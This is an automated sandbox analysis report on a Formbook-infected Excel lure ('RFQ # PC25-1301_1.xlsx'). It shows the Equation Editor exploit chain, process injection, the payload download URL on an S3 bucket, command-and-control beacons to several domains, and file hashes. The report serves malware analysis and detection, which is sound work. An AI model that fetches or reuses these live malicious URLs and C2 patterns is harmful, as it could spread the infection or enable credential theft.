Analysis

  • max time kernel
    147s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/01/2025, 11:47 UTC

General

  • Target

    RFQ # PC25-1301_1.xlsx

  • Size

    1.8MB

  • MD5

    d3f593571da9b55237a49f9c23a12d9a

  • SHA1

    b3c9a6ca51802326e7de5a6854199fc369bc3b08

  • SHA256

    ff07908a590dec7673c510ec4d0043d8825a54039e35b7c28c299f95c55336c3

  • SHA512

    114950c12cc9fd0aa50544caed8fa0f710cc596c67ec90d3b5d2e1a72c18b5706b25ef3030949805be0e90bab31d6010fe6b0d1ab090e0651b0254482e113df8

  • SSDEEP

    49152:OwVliPFnflCwADoUpbmepmSTKrks1l4FWQCMsx7/:Ow4dflKxpaepmS2rksiWQJsx7/

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

hwu6

Decoy


Signatures

  • Formbook

    Formbook is a data-stealing malware family.

  • Formbook family
  • Formbook payload (3 IoCs)
  • Blocklisted process makes network request (1 IoC)
  • Downloads MZ/PE file
  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (1 IoC)
  • AutoIT Executable (1 IoC)

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext (4 IoCs)
  • System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry (2 TTPs, 1 IoC)
  • Launches Equation Editor (1 TTP, 1 IoC)

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (30 IoCs)
  • Suspicious behavior: MapViewOfSection (7 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of FindShellTrayWindow (6 IoCs)
  • Suspicious use of SendNotifyMessage (4 IoCs)
  • Suspicious use of SetWindowsHookEx (3 IoCs)
  • Suspicious use of WriteProcessMemory (20 IoCs)

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1232
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\RFQ # PC25-1301_1.xlsx"
      2⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:3020
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2836
    • C:\Users\Admin\AppData\Roaming\word.exe
      C:\Users\Admin\AppData\Roaming\word.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\SysWOW64\svchost.exe
        C:\Users\Admin\AppData\Roaming\word.exe
        3⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\SysWOW64\msiexec.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\SysWOW64\cmd.exe
            /c del "C:\Windows\SysWOW64\svchost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2556

Network

  • flag-us
    DNS
    combo.s3.eu-north-1.amazonaws.com
    EQNEDT32.EXE
    Remote address:
    8.8.8.8:53
    Request
    combo.s3.eu-north-1.amazonaws.com
    IN A
    Response
    combo.s3.eu-north-1.amazonaws.com
    IN CNAME
    s3-r-w.eu-north-1.amazonaws.com
    s3-r-w.eu-north-1.amazonaws.com
    IN A
    3.5.217.48
    s3-r-w.eu-north-1.amazonaws.com
    IN A
    16.12.11.46
  • flag-se
    GET
    http://combo.s3.eu-north-1.amazonaws.com/arkobral2.1.exe
    EQNEDT32.EXE
    Remote address:
    3.5.217.48:80
    Request
    GET /arkobral2.1.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: combo.s3.eu-north-1.amazonaws.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    x-amz-id-2: SAu2wUccT5p1/Pz0fTLO3UbcHwIBWCNTfoMP26ped63feP7wiQIUCQGIuQnu3Afix+LEJLSVS7tw2CMQTPpYBfFIixJlHpC8
    x-amz-request-id: XEZMQ2PGYQ9CMRJ3
    Date: Thu, 16 Jan 2025 11:47:07 GMT
    Last-Modified: Thu, 16 Jan 2025 06:34:07 GMT
    ETag: "a4c3a8129428b0447fbe11d005d1e04b"
    x-amz-server-side-encryption: AES256
    Accept-Ranges: bytes
    Content-Type: application/x-msdownload
    Content-Length: 1795072
    Server: AmazonS3
  • flag-us
    DNS
    www.aragamand.business
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.aragamand.business
    IN A
    Response
    www.aragamand.business
    IN A
    172.67.151.125
    www.aragamand.business
    IN A
    104.21.0.245
  • flag-us
    DNS
    www.aragamand.business
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.aragamand.business
    IN A
  • flag-us
    DNS
    www.aragamand.business
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.aragamand.business
    IN A
  • flag-us
    GET
    http://www.aragamand.business/hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    172.67.151.125:80
    Request
    GET /hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.aragamand.business
    Connection: close
  • flag-us
    DNS
    www.lebahsemesta57.click
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.lebahsemesta57.click
    IN A
    Response
    www.lebahsemesta57.click
    IN CNAME
    lebahsemesta57.click
    lebahsemesta57.click
    IN A
    198.252.111.49
  • flag-us
    GET
    http://www.lebahsemesta57.click/hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    198.252.111.49:80
    Request
    GET /hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.lebahsemesta57.click
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 796
    date: Thu, 16 Jan 2025 11:48:23 GMT
    server: LiteSpeed
  • flag-us
    DNS
    www.olmanihousel.shop
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.olmanihousel.shop
    IN A
    Response
    www.olmanihousel.shop
    IN CNAME
    shops.myshopify.com
    shops.myshopify.com
    IN A
    23.227.38.74
  • flag-ca
    GET
    http://www.olmanihousel.shop/hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    23.227.38.74:80
    Request
    GET /hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.olmanihousel.shop
    Connection: close
    Response
    HTTP/1.1 403 Forbidden
    Date: Thu, 16 Jan 2025 11:48:44 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4517
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: max-age=15
    Expires: Thu, 16 Jan 2025 11:48:59 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n73iEfnczrI5np0UUfhWv98b9h5k7mB92JFPy79KwOEZfLQbY6Uao5vqGo7sX5NNKRPtapYugU1CvAoObblu%2BdgisWHHtuAAd7wiyZjHclx1GrzGFZShwNIbjVIB7BLk5DBw2Ct71w%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
    Server-Timing: cfRequestDuration;dur=42.000055
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    X-Permitted-Cross-Domain-Policies: none
    X-Download-Options: noopen
    Server: cloudflare
    CF-RAY: 902de0d0aca2cd35-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    www.7b5846.online
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.7b5846.online
    IN A
    Response
    www.7b5846.online
    IN A
    104.21.40.196
    www.7b5846.online
    IN A
    172.67.188.70
  • flag-us
    GET
    http://www.7b5846.online/hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0
    Explorer.EXE
    Remote address:
    104.21.40.196:80
    Request
    GET /hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0 HTTP/1.1
    Host: www.7b5846.online
    Connection: close
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 16 Jan 2025 11:49:04 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: close
    Cache-Control: max-age=3600
    Expires: Thu, 16 Jan 2025 12:49:04 GMT
    Location: https://7b5846.live
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BPEPuJ75g2Fqp%2BukC0FqJY5oSzKX3CrFl84Ll1AkR0xN6B9d3wbp7aglwbqK9fACEIUjro%2Bz0TTNrflgc4%2FfUFlC1xqX4Vq8EacdOgsSE7BHIEYKSEjtQUjRSyd3rW7blCulmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 902de14fa938652d-LHR
  • flag-us
    DNS
    www.skbdicat.xyz
    Explorer.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.skbdicat.xyz
    IN A
    Response
  • 3.5.217.48:80
    http://combo.s3.eu-north-1.amazonaws.com/arkobral2.1.exe
    http
    EQNEDT32.EXE
    58.8kB
    1.9MB
    1023
    1390

    HTTP Request

    GET http://combo.s3.eu-north-1.amazonaws.com/arkobral2.1.exe

    HTTP Response

    200
  • 172.67.151.125:80
    http://www.aragamand.business/hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    860 B
    196 B
    8
    4

    HTTP Request

    GET http://www.aragamand.business/hwu6/?K6AhK=xk9YjkKWA042zWNVZdBLMfyAcf1Gj8c1HwCRn2uRiiziDpL8ULKNdMUsBiOE8o4=&aBZPdF=D6AhchX0
  • 198.252.111.49:80
    http://www.lebahsemesta57.click/hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    398 B
    1.2kB
    5
    5

    HTTP Request

    GET http://www.lebahsemesta57.click/hwu6/?K6AhK=ODu4ekQJ0ce3S7aXxGg3+RhzvddFzZrUq5Bx/g1oT9XXpz5E6bRw28Rueiho5q0=&aBZPdF=D6AhchX0

    HTTP Response

    404
  • 23.227.38.74:80
    http://www.olmanihousel.shop/hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    487 B
    5.7kB
    7
    8

    HTTP Request

    GET http://www.olmanihousel.shop/hwu6/?K6AhK=aCxNSDvn7jd88IWbH9h6Q7ktXWpcIqU0HtWWCVPyf0vX7CEjLldxQZMX9pkYvz0=&aBZPdF=D6AhchX0

    HTTP Response

    403
  • 104.21.40.196:80
    http://www.7b5846.online/hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0
    http
    Explorer.EXE
    391 B
    996 B
    5
    5

    HTTP Request

    GET http://www.7b5846.online/hwu6/?K6AhK=YeF1y3EySuVcFQ9tXeh75tBAyvfTx5aO3+vngk/DjMG5ar2UMvTYBQlLOVrkwFg=&aBZPdF=D6AhchX0

    HTTP Response

    301
  • 8.8.8.8:53
    combo.s3.eu-north-1.amazonaws.com
    dns
    EQNEDT32.EXE
    79 B
    132 B
    1
    1

    DNS Request

    combo.s3.eu-north-1.amazonaws.com

    DNS Response

    3.5.217.48
    16.12.11.46

  • 8.8.8.8:53
    www.aragamand.business
    dns
    Explorer.EXE
    204 B
    100 B
    3
    1

    DNS Request

    www.aragamand.business

    DNS Request

    www.aragamand.business

    DNS Request

    www.aragamand.business

    DNS Response

    172.67.151.125
    104.21.0.245

  • 8.8.8.8:53
    www.lebahsemesta57.click
    dns
    Explorer.EXE
    70 B
    100 B
    1
    1

    DNS Request

    www.lebahsemesta57.click

    DNS Response

    198.252.111.49

  • 8.8.8.8:53
    www.olmanihousel.shop
    dns
    Explorer.EXE
    67 B
    116 B
    1
    1

    DNS Request

    www.olmanihousel.shop

    DNS Response

    23.227.38.74

  • 8.8.8.8:53
    www.7b5846.online
    dns
    Explorer.EXE
    63 B
    95 B
    1
    1

    DNS Request

    www.7b5846.online

    DNS Response

    104.21.40.196
    172.67.188.70

  • 8.8.8.8:53
    www.skbdicat.xyz
    dns
    Explorer.EXE
    62 B
    62 B
    1
    1

    DNS Request

    www.skbdicat.xyz

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Roaming\word.exe

    Filesize

    1.7MB

    MD5

    a4c3a8129428b0447fbe11d005d1e04b

    SHA1

    003981a4a1fae8444bf94214045da837e9b545ad

    SHA256

    daab245fae21bc5fe9a8ea52e9770b22d12e66a4fbfc1bc1ca027f200da20f2f

    SHA512

    2c5d40db81eeab537eb1ab0ec8dbc1fd78f15969fbf4ec0d5ad2ae24f55aa2948f0bbd3dfbf7ef6444a7da5b1aa7b2584a4c86bc5322d3d647ca3da9ffe0003a

  • memory/1232-25-0x0000000004FD0000-0x0000000005075000-memory.dmp

    Filesize

    660KB

  • memory/2652-18-0x0000000000020000-0x0000000000034000-memory.dmp

    Filesize

    80KB

  • memory/2652-20-0x0000000000020000-0x0000000000034000-memory.dmp

    Filesize

    80KB

  • memory/2652-21-0x00000000000B0000-0x00000000000DF000-memory.dmp

    Filesize

    188KB

  • memory/2740-13-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2740-15-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/3020-1-0x00000000724BD000-0x00000000724C8000-memory.dmp

    Filesize

    44KB

  • memory/3020-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/3020-17-0x00000000724BD000-0x00000000724C8000-memory.dmp

    Filesize

    44KB
